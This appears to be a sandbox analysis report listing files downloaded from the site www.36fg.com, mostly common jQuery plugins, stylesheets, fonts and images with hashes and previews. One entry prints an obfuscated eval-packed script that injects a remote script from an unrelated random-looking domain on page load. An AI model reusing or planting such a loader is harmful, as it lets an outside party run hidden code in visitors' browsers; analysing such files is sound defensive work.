                                                        Encrypted:false
                                                        SSDEEP:384:lPhVPXQ2G2XAQyqVxRQ5giCCMLtA15h5/F6l8aZwHwztLCpmst:lPBIt8I5h5t1qkOLCMst
                                                        MD5:BA6CF724C8BB1CF5B084E79FF230626E
                                                        SHA1:F455C5F153F872E52265F87A644FF89FE14A6FB6
                                                        SHA-256:3FDDC6D28ABA3C13D64CFD4847C333FF48C71D4A5A58BD1A0494CA6AE8AC1BB4
                                                        SHA-512:22C361E44DDE632DEDAFF2625F6631E2FB02BA3B6487097B48BAA09F02CD81FD381EBB7D053F525E52E56655B1F8E2B89DDCC0A002E1B0C35C0A6920823641D7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/magnific-popup.min.js
                                                        Preview:/*! Magnific Popup - v1.1.0 - 2016-02-20.* http://dimsemenov.com/plugins/magnific-popup/.* Copyright (c) 2016 Dmitry Semenov; */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 121 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):2706
                                                        Entropy (8bit):7.615552510437364
                                                        Encrypted:false
                                                        SSDEEP:48:ZAvnLPNzU8J3JB1Nw/i6PSbP/zPdoCy/MENTTqaDDex5QZGO0V1M5:uuW9wVSfjylN/reQ4O0V14
                                                        MD5:5CA6E96A65A8F2DD0CB92699FC47CB93
                                                        SHA1:33F2E158BB8BCB3E990FA2098914A11EE426FB47
                                                        SHA-256:5B334674EE02D7A78DC39FEFDF48538E4FE1ED6AC2FC849293F3C779A43F1F1C
                                                        SHA-512:3C82F5CACAD6C9EBA42DCE7617DEDC74929C4B73EEA7DA4EEDD7750E4AC2FAD7C06AEC15160E60B1C230F96C1B89D000F4A52AFAF62BB76604FB133DB4A7E248
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/picture/logo-2.png
                                                        Preview:.PNG........IHDR...y...0.....5.......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:E0D3813AFBDF11E9946AEE6A00AC5613" xmpMM:InstanceID="xmp.iid:E0D38139FBDF11E9946AEE6A00AC5613" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:b6c86112-0bef-3e4f-837b-24203171b571" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>J._.....IDATx..\kh\E..k...UV...mC.*6
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):13729
                                                        Entropy (8bit):4.745858540897648
                                                        Encrypted:false
                                                        SSDEEP:192:HDB2WWddon5PihhLF+c8+NFYEFlys8kUAb2l3bDp:udon56hhLQc8AFYEFlys8bAb2j
                                                        MD5:EBA5815E6EEE9F7C091548F102C8306F
                                                        SHA1:3F8A62D088764BD21783EDF2438D01C00F3A0BFD
                                                        SHA-256:C8095E4FD392AFE1D2CC2FA76C941923C482D18F5DBE01F0B2930488962A5232
                                                        SHA-512:8C84C2FE817C87116A1A32F3A68D303D55928EF79F42E8A8270494DCE18EA6CF6ADBFAFFB6C81031EA6970256E1AD1899D6BC4D947EA7EB834E793769E71D3BA
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/default.css
                                                        Preview:./*-- btn type --*/..btn-type-1 {. background: #ff2782 none repeat scroll 0 0;. color: #ffffff;. font-size: 16px;. font-weight: 500;. line-height: 1;. padding: 16px 35px;. text-transform: uppercase;. display: inline-block;. font-family: 'Poppins', sans-serif;. border-radius: 30px;. letter-spacing: 2px;. border: 2px solid #ff60a3;.}...btn-type-1:hover {. color: #353858;. background: #ffffff;.}...btn-type-2 {. background: #ff2782 none repeat scroll 0 0;. color: #ffffff;. font-size: 18px;. font-weight: 500;. line-height: 1;. padding: 20px 40px;. text-transform: uppercase;. display: inline-block;. font-family: 'Poppins', sans-serif;. border-radius: 30px;. border: 2px solid #ff60a3;.}...btn-type-2:hover {. color: #353858;. background: #ffffff;.}...btn-type-3 {. background: transparent;. color: #ffffff;. font-size: 18px;. font-weight: 500;. line-height: 1;. padding: 20px 40px;. text-transf
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (361)
                                                        Category:downloaded
                                                        Size (bytes):362
                                                        Entropy (8bit):5.4094023239485
                                                        Encrypted:false
                                                        SSDEEP:6:zDGhyfx7jYbIqSTOWCzk9hLMJvo+r1ZhiwM7dOr7Umo1Uvv5TvZW/MrCo:zDlvYc7OW9h4J7r1Z+7oTxZtrCo
                                                        MD5:5D3D830ACDAADEAFF7DE7CE0822C3D11
                                                        SHA1:1A09F51CB91558FDE445ED7ED306693B30E0856E
                                                        SHA-256:0C8716986951D50457D9D3C517F90B78EE0C0CBC43CB5CA3ED011D46EE79ED80
                                                        SHA-512:60463DCF797C663D452AEBE90D84EEE917719B1265949A79945E0F3A35C18BDEFA73E9A11CCB13F38F64A9F42521B76CE4B2189BB065B14A1780479D153B1D77
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/dgij3ogsjf2ffwg.js
                                                        Preview:;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9\\"></0>");',10,10,'script|document|writeln|src|https|oudngmslhifnsf|gdmgcyy|com|tj|js'.split('|'),0,{}));.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (7808)
                                                        Category:downloaded
                                                        Size (bytes):8044
                                                        Entropy (8bit):5.0319398937424875
                                                        Encrypted:false
                                                        SSDEEP:96:uLBvpnG3nnRh+1pRVKmHyjyYfAPiQc954LT4KN/WzdBUVKdBJEdfdpu531v8L7:uPG3nC19KWssPVpX4KN/eU8Ju4e/
                                                        MD5:DFE0EEDF8DA578F4A4C43B05448C51D9
                                                        SHA1:812D7071B4E44B1AA5D5EA6C7CE0B79EB9D46520
                                                        SHA-256:A0FDED691AED767F851011CD3185B928619298A21A0FBDAD4808A9E88B490833
                                                        SHA-512:9084433D6201A0AA45EFD1C9BF7C413D08192A3871CEA3061B637AF2CBEF21DE39C3DBE9FE14D7A11EDC0C44588551212C94EE4866FF737F991E07907CB9B41E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/waypoints.min.js
                                                        Preview:// Generated by CoffeeScript 1.6.2./*.jQuery Waypoints - v2.0.3.Copyright (c) 2011-2013 Caleb Troughton.Dual licensed under the MIT license and GPL license..https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt.*/.(function(){var t=[].indexOf||function(t){for(var e=0,n=this.length;e<n;e++){if(e in this&&this[e]===t)return e}return-1},e=[].slice;(function(t,e){if(typeof define==="function"&&define.amd){return define("waypoints",["jquery"],function(n){return e(n,t)})}else{return e(t.jQuery,t)}})(this,function(n,r){var i,o,l,s,f,u,a,c,h,d,p,y,v,w,g,m;i=n(r);c=t.call(r,"ontouchstart")>=0;s={horizontal:{},vertical:{}};f=1;a={};u="waypoints-context-id";p="resize.waypoints";y="scroll.waypoints";v=1;w="waypoints-waypoint-ids";g="waypoint";m="waypoints";o=function(){function t(t){var e=this;this.$element=t;this.element=t[0];this.didResize=false;this.didScroll=false;this.id="context"+f++;this.oldScroll={x:t.scrollLeft(),y:t.scrollTop()};this.waypoints={horizontal:{},vertica
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 7900, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):7900
                                                        Entropy (8bit):7.972884114843751
                                                        Encrypted:false
                                                        SSDEEP:192:p7uo9HQkQLb61fpJohI/gCvwsd2pbbhKn:p7v9wkYbkfpJPIqdyhK
                                                        MD5:9ED361BBA8488AEB2797B82BEFDA20F1
                                                        SHA1:6F80D965A066AFF81C0A344D4B7297BD009CC099
                                                        SHA-256:41E46FAFF74C6A77D581689EC35EB040F6C96D17F4D2C5B25DCCD42ED498B01C
                                                        SHA-512:A445D1850D9A03B32944586B426C1EB0E3CD42AD24D4C029E993F37C11CD24680FE9C354425A9D6A84FEF27A9E06704108D845F74C204C5BEC5A95F50CF50BD6
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/pxieyp8kv8jhgfvrjjfecg.woff2
                                                        Preview:wOF2..............?.............................. .0.`..T..L.6..6..6.$..h. ..\.....2.".8. .w.E."....n.p.M$DDxUU.o..0.#1.g.?_.p..!./T.....X..xLW.s....$......k.s.[...Wk"...>]+......3Y,$.....6{.36..=..J.?..H.'..+X9s...v...v....z.....z..^...."."h.....P.L...C..0...p....&o......R....q.....)...r....{.HE....ig.KT..0.-.%.z......9.|.A..|X..+%)..*..2&%$.nm.\.._.e.t5...n\..G...o.2.59..}C.I.9..K..l*..)j.%..X..%K.v."b.."...D;..`..y.$H..V..h.E/.E..}.v.5.[...~.....X<GW.+..(ppWD..f.Km....6@.w?`..@....F..D..9*z,c.....jL=.......&bS...l,.+..9..>*}..@.....q...xl...j...<>......>...._........._....W./..|.. .b...U>...l....!0.....>... ..@1.5...Y..xS..;..._..[.%a..&).raj.....w0 ...s....<...00.sg.f.4.0>_g....-.....FX;.........<...S.....!-`{...j#.I...B..(%.R.......;..U.U...1S..M.V-(...j....7.z.l;b..p.MZ.X......:E....*+^....."s.B....e,.=...PkyK..P.k..g......j.Oi[.6..qa..}.w..-Zx...X.,.`.... ...-KH..x....9.....%n3....t.z.....nT....5..... .t..ry.....2.~l....5..[.r....G......
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (30763)
                                                        Category:downloaded
                                                        Size (bytes):30929
                                                        Entropy (8bit):4.740566264554219
                                                        Encrypted:false
                                                        SSDEEP:384:su5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:3lr+Klk3Yi+fwYUf2l8yQ/e9vf
                                                        MD5:998B5A3137BF31BEC62E323CFB693E3E
                                                        SHA1:6E02DFA56888AF06C7548536EB767ED2FE55B25E
                                                        SHA-256:0FB75AACF7C0DA509B2C636FBB1B8C98F505DB74D8EFBC41A422521073554798
                                                        SHA-512:59FF435308A65DC2839D99CB852ADF34828C5861C6472743C9D3B65B402EECD34122389D34C46E24DE2E036A05888C4CAEAF8680A8D2BF73E9D6BEB56AF57B40
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/fontawesome-all.min.css
                                                        Preview:./*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot');src:url('../fonts/fontawesome-webfont.eot') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2') format('woff2'),url('../fonts/fontawesome-webfont.woff') format('woff'),url('../fonts/fontawesome-webfont.ttf') format('truetype'),url('../fonts/fontawesome-webfont.svg') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.142857
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 34260, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):34260
                                                        Entropy (8bit):7.99397789286338
                                                        Encrypted:true
                                                        SSDEEP:768:dNzPGSJNFDOYy5h3b2vL6xATEdrQP+8lI+v2C9PxRL6zJLC:37GSxKtZlxAAdQP+8h2C9PxRL69O
                                                        MD5:5B23EEB3A32B30E91682D601535D2A89
                                                        SHA1:48469F0155A13F3499DB31D53CBA5D47E8B528B5
                                                        SHA-256:4F4524F7E1A87079BC50A64681F880CCF3E6F5DB1EC5FC27949377532A3881DA
                                                        SHA-512:6E735098F3986239766821C9B37DB97ACDA9E1A0A0A6CF0C630AF49C4B9C9B09CBA6349D91E15669F8853A48A3F44B72CE53440D7F42F0A8A2D4F398DA8E7496
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/fonts/4ics6kvjbnbylgokfw72.woff2
                                                        Preview:wOF2...................k..........................V....`..V..p.....#.....x..r......H.6.$..,. ..v..j..q[........FE..Nf._..Z.+........*2.l.h`.g.......L.X.... bV...B...x.^jS.k.9..1....=.*..|..lb.x..+F.$..W./.Z.[.A6b..!.....`...3...U.?.2...........|...$..?.RB.a6..L..3a...[.G.)k...Q.b_W..]..Z._..Tv(T.K....-..3E..Tn.-?a...5.....Z.I...."..<tr.n...N..d.iR.b..|.&7G'.h..;.g.f.....X...,..5.c..*.Qal.y..........:...H...e3"VU.x..............7...Zd..|.4.......,..c..E....U.`..(.......0..z..R.-..|....f....z.O.%.d...8.V+eo..<`.&;...+....%....#..zf..%....r.k......q.........?......>.v.L(`..Z...9....x.3....p..P.A.p.B.R.k}U...?..{...!$.(..&.mb.KZ..$B$.........XPy..l.4......4)J..p".&..t...y...s~....:uB...CR.Z.Z.....F...+9....x.. ..^r.=8.$....Y..I!...</k`.........L....%:..4h.@0......I.-..'`.....J..u..S........8.Q.|...5......Q..k7......J..=.A.....r..~.B...3......,J..*..\4)z.2........c`R.Em.IC..l2.;.:.P..D.O.....?u.I..xON...l..<.2........*B...:...~.....8..Z+.Q.B.....}.....D.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):70327
                                                        Entropy (8bit):4.780414763367357
                                                        Encrypted:false
                                                        SSDEEP:192:UnSfe5dESfrjdhwCCKit/pRmG73PwjfHM9ZEklMz1GSzkdjEyg1U3dxH2HEi6Sqd:UP+/ZdZ/gpgdZbZv
                                                        MD5:66336CD8C5B6B38357683642F4BBED1F
                                                        SHA1:D8EBA06697AE412AAAE6EA6E06C849469281A2F8
                                                        SHA-256:4C9E6AF92CF24EFAB62D7061B66229F5EBF82EC8EB0C08BEB52B8F116F3362F7
                                                        SHA-512:01F4F29D640906A68F02029CEF428DAAD0E8319EB453E11F5D07CCE6952005B8EAA13985D2E5D7F48DA709C63EC5CE3C26504C347C898FBC8340CE7DFA8F54DB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/animate.min.css
                                                        Preview:.@charset "UTF-8";../*!. * animate.css -http://daneden.me/animate. * Version - 3.6.0. * Licensed under the MIT license - http://opensource.org/licenses/MIT. *. * Copyright (c) 2018 Daniel Eden. */.. .animated {. -webkit-animation-duration: 1s;. animation-duration: 1s;. -webkit-animation-fill-mode: both;. animation-fill-mode: both;. }.. .animated.hinge {. -webkit-animation-duration: 2s;. animation-duration: 2s;. }.. @-webkit-keyframes bounce {. 0%, 20%, 50%, 80%, 100% {. -webkit-transform: translateY(0);. transform: translateY(0);. }.. 40% {. -webkit-transform: translateY(-30px);. transform: translateY(-30px);. }.. 60% {. -webkit-transform: translateY(-15px);. transform: translateY(-15px);. }. }.. @keyframes bounce {. 0%, 20%, 50%, 80%, 100% {. -webkit-transform: translateY(0);. -ms-transform: translateY(0);. transform: translateY(0);. }.. 40% {. -webkit-transform: translateY(-30px);. -ms-transform: translateY(-
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (917)
                                                        Category:downloaded
                                                        Size (bytes):1067
                                                        Entropy (8bit):5.286069295508756
                                                        Encrypted:false
                                                        SSDEEP:24:yixqwVpXi5f0N/+tNxftNnsI7Z2fSJdeTIItFisu7Up1sFyn:fxVix5oIn6Fey
                                                        MD5:EF36CCA760BF1CD76CFCD0E4DC10CEF1
                                                        SHA1:EF38469F60D58850FE55C4DE2EC7E289A2415D71
                                                        SHA-256:26D40F8FFDF1B9BF286A954C6888A33CDA0CD031E802D821FE0C0562E379AE29
                                                        SHA-512:77C175276932891A30041FFCFE9016B2A525D304843A41B92804E4555E2C95F6E5ABD55143A3320D95715A5DAD59DFA63E1B826E94C1E0CEEE53FC7D165810F5
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/counterup.min.js
                                                        Preview:/*!.* jquery.counterup.js 1.0.*.* Copyright 2013, Benjamin Intal http://gambit.ph @bfintal.* Released under the GPL v2 License.*.* Date: Nov 26, 2013.*/(function(e){"use strict";e.fn.counterUp=function(t){var n=e.extend({time:400,delay:10},t);return this.each(function(){var t=e(this),r=n,i=function(){var e=[],n=r.time/r.delay,i=t.text(),s=/[0-9]+,[0-9]+/.test(i);i=i.replace(/,/g,"");var o=/^[0-9]+$/.test(i),u=/^[0-9]+\.[0-9]+$/.test(i),a=u?(i.split(".")[1]||[]).length:0;for(var f=n;f>=1;f--){var l=parseInt(i/n*f);u&&(l=parseFloat(i/n*f).toFixed(a));if(s)while(/(\d+)(\d{3})/.test(l.toString()))l=l.toString().replace(/(\d+)(\d{3})/,"$1,$2");e.unshift(l)}t.data("counterup-nums",e);t.text("0");var c=function(){t.text(t.data("counterup-nums").shift());if(t.data("counterup-nums").length)setTimeout(t.data("counterup-func"),r.delay);else{delete t.data("counterup-nums");t.data("counterup-nums",null);t.data("counterup-func",null)}};t.data("counterup-func",c);setTimeout(t.data("counterup-func"),r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 1920 x 636, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):427076
                                                        Entropy (8bit):7.99438735345465
                                                        Encrypted:true
                                                        SSDEEP:6144:+mc5UaBHLeubOusQ9dXkb0noYkk9girgnGR20gqa58JEWDcMiZOAiksbUqX:toFegOy9FQAoYz9girO620lNL2QoMX
                                                        MD5:4DEC1089F739E65C4E0B73997DEA8318
                                                        SHA1:1AFEDEF01AE5C7AC15FB8EA3158E94AC87EE6F4B
                                                        SHA-256:5A0583B7E74FEABF9887A5959DC8EF1121942162C6706DD8DFB49D3A5014B152
                                                        SHA-512:6DBA221ADEBC45C33BF8792ED2088DCDF22B6FF854C6A037195EA821B84A1D84B272723ACF4A61B9F204EF9CB2E9A341AD64A10C78CF09667983E0336B43DA7A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/images/breadcrumb.png
                                                        Preview:.PNG........IHDR.......|............tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4" xmpMM:DocumentID="xmp.did:7537D6B3FBE011E98E90E01D7ED8B7D1" xmpMM:InstanceID="xmp.iid:7537D6B2FBE011E98E90E01D7ED8B7D1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:39ddb404-a848-5242-adf7-8b648b3adca0" stRef:documentID="xmp.did:caacb473-bd35-234a-88ca-1804bf3321d4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.7.....dIDATx..iz#;.%.s..#2....^H..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (50758)
                                                        Category:downloaded
                                                        Size (bytes):51039
                                                        Entropy (8bit):5.247253437401007
                                                        Encrypted:false
                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/bootstrap.min.js
                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):2176
                                                        Entropy (8bit):4.8792785731861645
                                                        Encrypted:false
                                                        SSDEEP:24:BZB+N+g+A5vVeAVwssgY4FjGouL6PhtFs2DHyb7ViS+WbjxsO0eTM9f3Ussn3Sdi:4VZYIFptf2b7ViS+WJB0eTM9fu3M5Y
                                                        MD5:10A761AA2D9056AE94617704106A0B0F
                                                        SHA1:27CC8E2DC2466E9FF1D64DF0CD4AE4031217C3A1
                                                        SHA-256:A93FA5D04EAFBE94677A01457D61AABB5DFB36CBC6D804F7D7A2024DEAFA702A
                                                        SHA-512:34BD2C6B9AED72822C7BA89BDB329A5233AB756F6DE861B3F7B537F4F2AEC14B7C10A859452DA0750A4DC48ECE31548DC79EBED0366EB9C0112AD65513623974
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/scrolltop.css
                                                        Preview:./**.* material-scrolltop.*.* Author: Bartholomej.* Website: https://github.com/bartholomej/material-scrolltop.* Docs: https://github.com/bartholomej/material-scrolltop.* Repo: https://github.com/bartholomej/material-scrolltop.* Issues: https://github.com/bartholomej/material-scrolltop/issues.*/...material-scrolltop {. display: block;. position: fixed;. width: 0;. height: 0;. bottom: 23px;. right: 23px;. padding: 0;. overflow: hidden;. outline: none;. border: none;. border-radius: 2px;. box-shadow: 0 3px 10px rgba(0, 0, 0, 0.5);. cursor: hand;. border-radius: 50%;. background: #000;. -webkit-tap-highlight-color: rgba(0, 0, 0, 0);. -webkit-transition: all 0.3s cubic-bezier(0.25, 0.25, 0, 1);. -ms-transition: all 0.3s cubic-bezier(0.25, 0.25, 0, 1);. -moz-transition: all 0.3s cubic-bezier(0.25, 0.25, 0, 1);. -o-transition: all 0.3s cubic-bezier(0.25, 0.25, 0, 1);. transition: all 0.3s cubic-bezier(0.25, 0.25, 0, 1);.}...mat
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text
                                                        Category:downloaded
                                                        Size (bytes):2239
                                                        Entropy (8bit):4.375215337944591
                                                        Encrypted:false
                                                        SSDEEP:24:QvKH3bzNjWwQgaYZ/ereD5IFfdnr5FIb8QMBX4/ErDLfGDRyZlysdSEsitNI9CW:1NjWfo/eVZdnroSl3uGysdSEj69CW
                                                        MD5:36E8C3C87020B0AC057FA96463619793
                                                        SHA1:3BAB73AD0A2528B80270B2413AB7955F956ACEE8
                                                        SHA-256:8A29DD36263E340E17993BC8A3F8A17C7802B07B36C8592A493C4D0F31BC3FE5
                                                        SHA-512:A331EE92C98981F94DB0000507B636E8D033F4A61E5F0574330F859A1A532DC557B4D1CCABD693CB5939696D91A8CCDF376D9C91D539A853B8A4B6EA951263FF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/scrolltop.js
                                                        Preview:/**. * Material-scrollTop. *. * Author: Bartholomej. * Website: https://github.com/bartholomej/material-scrollTop. * Docs: https://github.com/bartholomej/material-scrollTop. * Repo: https://github.com/bartholomej/material-scrollTop. * Issues: https://github.com/bartholomej/material-scrollTop/issues. */.(function($) {. function mScrollTop(element, settings) {.. var _ = this,. breakpoint;. var scrollTo = 0;.. _.btnClass = '.material-scrolltop';. _.revealClass = 'reveal';. _.btnElement = $(_.btnClass);.. _.initial = {. revealElement: 'body',. revealPosition: 'top',. padding: 0,. duration: 600,. easing: 'swing',. onScrollEnd: false. }.. _.options = $.extend({}, _.initial, settings);.. _.revealElement = $(_.options.revealElement);. breakpoint = _.options.revealPosition !== 'bottom' ? _.revealElement.offset().top : _.revealElement.offset().top
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8385)
                                                        Category:downloaded
                                                        Size (bytes):8415
                                                        Entropy (8bit):5.104931068425687
                                                        Encrypted:false
                                                        SSDEEP:96:UrZgL1xvPV6GqKgR6TYLWHFMLJA6pOROVEE1fosvGeaMozHImBaoqbl:Ury9PVfIFrlAJROVEEdos+eatzHILoA
                                                        MD5:36050285BFEEB7395752F0F9BBC08273
                                                        SHA1:5924F7BBBF1DFA3F0926851D01F782F23A59E805
                                                        SHA-256:0EC632E6AB02D4FDD514DA7F5EDC74AA28C9D4C71AF76F1C8B93A1FBA85BCC69
                                                        SHA-512:BF887E087C52583114B77BFB417D7DFFA0EE8634D39155AF14591A24B2ADD9EF4C8A0C0555364122800D07A55F5F1FB0C723B39541B069A437FF558DDBF380A3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/wow.min.js
                                                        Preview:/*! WOW - v1.1.3 - 2016-05-06.* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return b;return-1};b=function(){function a(){}return a.prototype.extend=function(a,b){var c,d;for(c in b)d=b[c],null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a.prototype.createEvent=function(a,b,c,d){var e;return null==b&&(b=!1),null==c&&(c=!1),null==d&&(d=null),null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.createEventObject(),e.eventType=a):e.eventName=a,e},a.prototype.emitEvent=function(a,b){return null!=a.dispatchEvent?a.dispatchEvent(b):b in(null!=a)?a[b]():"on"+b in(null!=a)?a["on"+b]():void 0},a.prototype.addEvent=function(a,b,c){return null!=a.addE
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
